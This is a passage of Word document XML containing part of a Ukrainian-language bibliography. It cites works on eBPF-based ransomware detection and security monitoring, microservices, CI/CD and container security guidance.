          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Журавчак, Д. Використання EBPF для ідентифікації вірусів</w:t>
      </w:r>
      <w:r w:rsidR="003E7A2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">-вимагачів, що вико-ристовують </w:t>
      </w:r>
      <w:r w:rsidR="003E7A2D" w:rsidRPr="003E7A2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>DNS-зап</w:t>
      </w:r>
      <w:r w:rsidR="0032308E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ити</w:t>
      </w:r>
      <w:r w:rsidR="003E7A2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> DGA/Журавчак Даниїл, Кійко Едуард, Дудикевич Валерій </w:t>
      </w:r>
      <w:r w:rsidR="003E7A2D" w:rsidRPr="003E7A2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>// Information Technology and Security. –2023. –Vol. 11, Iss. 2 (21). –</w:t>
      </w:r>
      <w:r w:rsidR="003E7A2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003E7A2D" w:rsidRPr="003E7A2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Pp. 166–174</w:t>
      </w:r>
      <w:r w:rsidR="003E7A2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032308E" w:rsidRDefault="00191CBC" w:rsidP="0032308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4. </w:t>
      </w:r>
      <w:r w:rsidR="003E7A2D" w:rsidRPr="003E7A2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>С. Хрущак, О. Бойко, М. Терьохіна</w:t>
      </w:r>
      <w:r w:rsidR="003E7A2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003E7A2D" w:rsidRPr="003E7A2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Безпековий моніторинг інформаційних систем за допомогою eBPF</w:t>
      </w:r>
      <w:r w:rsidR="0032308E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> // </w:t>
      </w:r>
      <w:r w:rsidR="0032308E" w:rsidRPr="0032308E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Наука і техніка сьогодні</w:t>
      </w:r>
      <w:r w:rsidR="0032308E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">. – 2024. – </w:t>
      </w:r>
      <w:r w:rsidR="0032308E" w:rsidRPr="0032308E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>№ 4(32) (2024</w:t>
      </w:r>
      <w:r w:rsidR="0032308E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>). С. 1251 – 1262.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00191CBC" w:rsidRDefault="0032308E" w:rsidP="0032308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5. </w:t>
      </w:r>
      <w:r w:rsidRPr="0032308E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Куліков, Є. (2022). Галузь розробки програмного забезпечення очима ІТ Ukraine.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0032308E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>https://ko.com.ua/vitchiznyana_it-galuz_ochima_it_ukraine_140263</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032308E" w:rsidRPr="0032308E" w:rsidRDefault="0032308E" w:rsidP="0032308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6. </w:t>
      </w:r>
      <w:r w:rsidRPr="0032308E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Newman, S. (2021). Building Microservices, 2d Edition: Designing Fine-Grained Systems. O'Reilly Media.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0032308E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>https://www.oreilly.com/library/view/building-microservices-2nd/9781492034018/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032308E" w:rsidRDefault="0032308E" w:rsidP="0032308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7. </w:t>
      </w:r>
      <w:r w:rsidRPr="0032308E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>TeamCity (2020). Agile Continuous Integration. https://www.jetbrains.com/teamcity/ci-cd-guide/agilecontinuous-integration/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032308E" w:rsidRPr="0032308E" w:rsidRDefault="00191CBC" w:rsidP="00BC54F7">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8. </w:t>
      </w:r>
      <w:r w:rsidR="0032308E" w:rsidRPr="0032308E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>TeamCity (2020). What are CI/CD Tools and how do they work. https://www.jetbrains.com/teamcity/cicd-guide/ci-cd-tools/</w:t>
      </w:r>
      <w:r w:rsidR="00BC54F7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032308E" w:rsidRPr="0032308E" w:rsidRDefault="00BC54F7" w:rsidP="00BC54F7">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9 </w:t>
      </w:r>
      <w:r w:rsidR="0032308E" w:rsidRPr="0032308E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>DORA (2022). Accelerate State of DevOps Report 2022. https://services.google.com/fh/files/misc/2022_state_of_devops_report.pdf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032308E" w:rsidRPr="0032308E" w:rsidRDefault="00BC54F7" w:rsidP="00BC54F7">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10 </w:t>
      </w:r>
      <w:r w:rsidR="0032308E" w:rsidRPr="0032308E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>TeamCity (2020). What is DevSecOps and its role in CD. https://www.jetbrains.com/en-us/teamcity/ci-cdguide/what-is-devsecops/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00191CBC" w:rsidRDefault="00BC54F7" w:rsidP="00BC54F7">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11. </w:t>
      </w:r>
      <w:r w:rsidR="0032308E" w:rsidRPr="0032308E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Scott, James A. (2017). A Practical Guide to Microservices and Containers. Mastering the Cloud, Data, and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0032308E" w:rsidRPr="0032308E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Digital Transformation. https://www.academia.edu/41522528/A_Practical_Guide_to_Microservices</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0032308E" w:rsidRPr="0032308E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>_and_Containers_Mastering_the_Cloud_Data_and_Digital_Transformation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00191CBC" w:rsidRDefault="00BC54F7" w:rsidP="003C65D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12. </w:t>
      </w:r>
      <w:r w:rsidR="003C65DB" w:rsidRPr="003C65DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Souppaya, M., Morello, J., Scarfone, K. (2017). NIST Special Publication 800-190. Application Container</w:t>
      </w:r>
      <w:r w:rsidR="003C65DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003C65DB" w:rsidRPr="003C65DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Security Guide. https://doi.org/10.6028/NIST.SP.800-190</w:t>
      </w:r>
      <w:r w:rsidR="003C65DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC54F7" w:rsidRPr="003C65DB" w:rsidRDefault="00BC54F7" w:rsidP="003C65D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13. </w:t>
      </w:r>
      <w:r w:rsidR="003C65DB" w:rsidRPr="003C65DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Microsoft. Developer tools, technical docu</w:t>
      </w:r>
      <w:r w:rsidR="003C65DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">mentation and coding examples </w:t>
      </w:r>
      <w:r w:rsidR="003C65DB" w:rsidRPr="003C65DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Microsoft</w:t>
      </w:r>
      <w:r w:rsidR="003C65DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003C65DB" w:rsidRPr="003C65DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Docs. [Веб-сайт]. URL: https://docs.microsoft.com/ruru/virtualization/windowscontainers/about/containers-vs-vm\ (дата звернення:</w:t>
      </w:r>
      <w:r w:rsidR="003C65DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003C65DB" w:rsidRPr="003C65DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>09.11.2021).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC54F7" w:rsidRDefault="00BC54F7" w:rsidP="003C65D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14. </w:t>
      </w:r>
      <w:r w:rsidR="003C65DB" w:rsidRPr="003C65DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Amazon, Microsoft Or Google: Which Is The Best Play On Surging</w:t>
      </w:r>
      <w:r w:rsidR="003C65DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003C65DB" w:rsidRPr="003C65DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Cloud Infrastructure Demand, URL:</w:t>
      </w:r>
      <w:r w:rsidR="003C65DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003C65DB" w:rsidRPr="003C65DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>https://www.forbes.com/sites/greatspeculations/2020/05/14/amazon- microsoft-orgoogle-which-is-the-best-play-on-surging-cloud-infrastructure- demand/ (Дата</w:t>
      </w:r>
      <w:r w:rsidR="003C65DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003C65DB" w:rsidRPr="003C65DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>звернення: 1</w:t>
      </w:r>
      <w:r w:rsidR="003C65DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="003C65DB" w:rsidRPr="003C65DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.1</w:t>
      </w:r>
      <w:r w:rsidR="003C65DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>1.2024</w:t>
      </w:r>
      <w:r w:rsidR="003C65DB" w:rsidRPr="003C65DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC54F7" w:rsidRDefault="00BC54F7" w:rsidP="00C95949">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15. </w:t>
      </w:r>
      <w:r w:rsidR="00C95949" w:rsidRPr="00C95949">
        <w:rPr>
